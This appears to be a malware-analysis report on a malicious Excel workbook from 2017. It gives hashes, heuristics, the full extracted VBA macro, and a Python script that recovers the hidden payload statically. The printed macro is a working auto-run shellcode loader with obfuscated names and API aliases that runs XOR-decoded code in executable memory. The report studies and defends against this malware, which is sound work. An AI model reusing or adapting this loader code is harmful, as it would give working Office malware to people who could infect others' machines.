Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ffa1a921af653e73…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 38.6 KB
Created: 2017-07-26 21:52:58
Authoring application: Microsoft Excel
First seen: 2017-08-08
MD5: c7b35d69ba198ea9337b077427ac869d
SHA-1: 864982a2b3809308ea6c61f96162233cf4f0944a
SHA-256: ffa1a921af653e733f3d6a59c7c6d299aa9a72462ac9d0c8d14a1678fd364221
Risk score: 78

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The workbook carries both a VBA project and an Excel 4.0 (XLM) macro sheet, and the Workbook_Open and Document_Open heuristics fire. Execution starts from Workbook_Open, the Excel auto-run event; it calls a Document_Open stub (a Word event name that Excel never raises by itself), which calls the main routine. That routine reads the workbook's own file from disk (ActiveWorkbook.FullName), splits the bytes on a long fixed marker string, keeps what follows the last marker, drops two bytes, and XOR-decodes the rest with the repeating 26-byte key "JWeSWJycaBeXCLyjuaSYqURekx". The decoded bytes are copied with NtWriteVirtualMemory into the current process (handle -1) at an RWX region obtained from VirtualAlloc (MEM_COMMIT, PAGE_EXECUTE_READWRITE) and started with CreateThread. This is an in-process shellcode loader whose payload travels inside the document file itself; the macro downloads nothing, so any downloader or dropper behaviour would belong to the shellcode, which is not visible here. Most identifiers are randomized, the kernel32 imports are declared under aliases so the real API names appear only in the Alias clauses, and the memory write uses the ntdll export rather than the kernel32 WriteProcessMemory wrapper, a choice commonly made to get past user-mode hooks on the wrapper. The module name BuÇalışmaKitabı is the Turkish-locale default name for ThisWorkbook, which matches the XLM sheet name Makro.

Heuristics (6)

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    The VBA source declares VirtualAlloc under the alias wqieosdkWGFhPYNFGvppOln and calls it with MEM_COMMIT (&H1000) and PAGE_EXECUTE_READWRITE (&H40), i.e. an RWX allocation sized to the decoded payload.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream (a visible sheet named Makro). XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022. For this sample the carved XLM listing holds only the BOUNDSHEET and PRINTHEADERS records and no formulas, and no Auto_Open name is visible in it, so the VBA project is the active component.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open is the Word auto-run event; Excel does not raise it, and here it only runs because Workbook_Open calls it.
    Matched line in script
    Public Sub Document_Open()
        raHdABOeZHybFUqnxMvUML
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open is the Excel auto-run event and the real entry point of this sample.
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4702 bytes
SHA-256: dade35c58122e76a9a8383fdb73fd13a8d23a273f6b5a2268ffacbb32f2b52f7
Detection: ClamAV: No threats found
Obfuscation or payload: likely
39 of 71 identifiers look randomly generated, consistent with name-mangling obfuscation. The tool's quoted example 'haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJX' is the opening of the string literal passed to Split rather than an identifier; the declared names (wqieosdkWGFhPYNFGvppOln, raHdABOeZHybFUqnxMvUML, bqEDQaVZHp) show the same pattern.
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As LongPtr, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As LongPtr
Private Declare PtrSafe Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As LongPtr, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As LongPtr, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As LongPtr, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As LongPtr, ByRef VooEsilLrzmcPJskIeB As LongPtr) As LongPtr
#Else
Private Declare Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread"  (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As Long, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As Long
Private Declare Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As Long, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As Long, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As Long, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As Long, ByRef VooEsilLrzmcPJskIeB As Long) As Long
#End If

Const BQtsEMXQdQ = &H1000
Const kxiEEplHEtFygBTjeOIiho = &H40

Public Sub raHdABOeZHybFUqnxMvUML()
    Dim VuQRdWV() As Byte

    VuQRdWV = CokBrkmkOTTa(ActiveWorkbook.FullName)
    Dim jyjPJ As String
    jyjPJ = StrConv(VuQRdWV, 64)
    
    Dim CKEcHyHGwDDAHLySoXFU
    CKEcHyHGwDDAHLySoXFU = Split(jyjPJ, "haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJXfIwlwlknBMgwIHAlhLCbaGQMossoDcJfVDKYAIBhbiHASwniQUiBvHWz")

    Dim JKKLidHoCwfHIVbRSfnyoYm As String
    Dim USPbaXBGT As String
    Dim XefQKouerNuRsviD As String
    USPbaXBGT = StrConv(StrConv(CKEcHyHGwDDAHLySoXFU(UBound(CKEcHyHGwDDAHLySoXFU)), 64), 128)
    XefQKouerNuRsviD = Mid$(USPbaXBGT, 3, Len(USPbaXBGT))

    JKKLidHoCwfHIVbRSfnyoYm = iEBUuBXDakOwcUky("JWeSWJycaBeXCLyjuaSYqURekx", XefQKouerNuRsviD)
    
    #If VBA7 Then
        Dim zXQUeXNBXvoNaUW As LongPtr
        Dim gWUTRWrnQLDT As LongPtr
    #Else
        Dim zXQUeXNBXvoNaUW As Long
        Dim gWUTRWrnQLDT As Long
    #End If

    zXQUeXNBXvoNaUW = wqieosdkWGFhPYNFGvppOln(0, Len(JKKLidHoCwfHIVbRSfnyoYm), BQtsEMXQdQ, kxiEEplHEtFygBTjeOIiho)
    gWUTRWrnQLDT = NtWriteVirtualMemory(-1, zXQUeXNBXvoNaUW, JKKLidHoCwfHIVbRSfnyoYm, Len(JKKLidHoCwfHIVbRSfnyoYm), 0)
    gWUTRWrnQLDT = bqEDQaVZHp(0, 0, zXQUeXNBXvoNaUW, 0, 0, 0)
End Sub

Public Function CokBrkmkOTTa(ByVal qyuarThySZQwawRswxLxviUTfWs As String) As Byte()
    Dim USPbaXBGT As Long
    Dim XefQKouerNuRsviD() As Byte
    USPbaXBGT = FreeFile
    If LenB(Dir(qyuarThySZQwawRswxLxviUTfWs)) Then
        Open qyuarThySZQwawRswxLxviUTfWs For Binary Access Read As USPbaXBGT
        ReDim XefQKouerNuRsviD(LOF(USPbaXBGT) - 1&) As Byte
        Get USPbaXBGT, , XefQKouerNuRsviD
        Close USPbaXBGT
    Else
        Err.Raise 53
    End If
    CokBrkmkOTTa = XefQKouerNuRsviD
    Erase XefQKouerNuRsviD
End Function

Public Sub Document_Open()
    raHdABOeZHybFUqnxMvUML
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function iEBUuBXDakOwcUky(AGrFyFzaFEPdAtSxztcsDCCinJdFI As String, TjsuUBlTJYbT As String) As String
    Dim WhAzRWYDAiguXdjrOCUrqLGK As Long
    Dim yrlFJeq As String
    Dim NGaNjmJKLsbmZXxcBVwhBy As Integer, iwQHCxWirTNQVPyGsf As Integer, a As Long

    For WhAzRWYDAiguXdjrOCUrqLGK = 1 To Len(TjsuUBlTJYbT)
        a = WhAzRWYDAiguXdjrOCUrqLGK Mod Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
        If a = 0 Then a = Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
        
        NGaNjmJKLsbmZXxcBVwhBy = Asc(Mid$(TjsuUBlTJYbT, WhAzRWYDAiguXdjrOCUrqLGK, 1))
        iwQHCxWirTNQVPyGsf = Asc(Mid$(AGrFyFzaFEPdAtSxztcsDCCinJdFI, a, 1))
        yrlFJeq = yrlFJeq + Chr(NGaNjmJKLsbmZXxcBVwhBy Xor iwQHCxWirTNQVPyGsf)
    Next WhAzRWYDAiguXdjrOCUrqLGK
    
   iEBUuBXDakOwcUky = yrlFJeq
End Function
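Because the payload is carried inside the document and the decoder is fully visible above, the shellcode can be recovered statically without ever letting the macro run. The script below is an added example, not part of the report or of the sample: it reimplements the decode path of raHdABOeZHybFUqnxMvUML in Python (split on the marker, keep the data after the last marker, drop two bytes as Mid$(s, 3) does, XOR with the repeating key). MARKER and XOR_KEY are copied from the extracted VBA; build_sample constructs a stand-in document for testing and is not the real file, and its assumption that the two skipped bytes are a CRLF is this script's, not something the sample shows. The StrConv(StrConv(x, vbUnicode), vbFromUnicode) pair in the macro is a widen/narrow round trip that leaves the bytes unchanged, so it has no counterpart here.

```python
"""
Static payload recovery for this sample's VBA loader.

Added example, not from the report or the sample.  MARKER and XOR_KEY are taken
from the extracted macro; build_sample() is a CONSTRUCTED stand-in document.
"""
import sys

# String literal passed to Split() in raHdABOeZHybFUqnxMvUML (copied from the VBA)
MARKER = (b"haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJX"
          b"fIwlwlknBMgwIHAlhLCbaGQMossoDcJfVDKYAIBhbiHASwniQUiBvHWz")
# First argument to iEBUuBXDakOwcUky(), the repeating XOR key (26 bytes)
XOR_KEY = b"JWeSWJycaBeXCLyjuaSYqURekx"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR.  The macro's 1-based 'i Mod Len(key), 0 -> Len(key)'
    index is exactly (i - 1) % len(key), i.e. the usual cyclic key index."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def has_loader_marker(doc: bytes) -> bool:
    """True if the file carries the split marker this loader looks for."""
    return MARKER in doc


def recover_payload(doc: bytes) -> bytes:
    """Return the decoded shellcode exactly as the macro would write it into the
    VirtualAlloc'd RWX region.  Raises ValueError if the marker is absent
    (different sample, or the payload overlay was stripped)."""
    if not has_loader_marker(doc):
        raise ValueError("loader marker not found")
    # UBound(Split(...)): the segment after the LAST marker.  Taking the last one
    # skips any earlier copy of the marker, e.g. inside the VBA stream itself.
    tail = doc.split(MARKER)[-1]
    # Mid$(s, 3, ...): the first two bytes after the marker are discarded
    return xor_repeating(tail[2:], XOR_KEY)


def build_sample(shellcode: bytes) -> bytes:
    """CONSTRUCTED stand-in for the document, used only to exercise the decoder:
    an OLE compound-file magic plus padding, the marker, two filler bytes
    (ASSUMED to be CRLF; the real sample's reason for the skip is not visible),
    then the XOR-encoded payload appended as an overlay."""
    ole_magic = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
    return ole_magic + MARKER + b"\r\n" + xor_repeating(shellcode, XOR_KEY)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            doc = fh.read()
    else:
        doc = build_sample(bytes(range(256)))   # self-test input when no path given
    payload = recover_payload(doc)
    print(f"payload: {len(payload)} bytes, head: {payload[:16].hex()}")
    with open("payload.bin", "wb") as fh:
        fh.write(payload)
```

Run as `python recover.py sample.xls` to write payload.bin, which can then go to a shellcode emulator or disassembler for the next stage of analysis. If the marker is not found, the file on disk is not the same bytes the macro expects to read through ActiveWorkbook.FullName (for instance a re-saved copy), and the payload has to be recovered from the original.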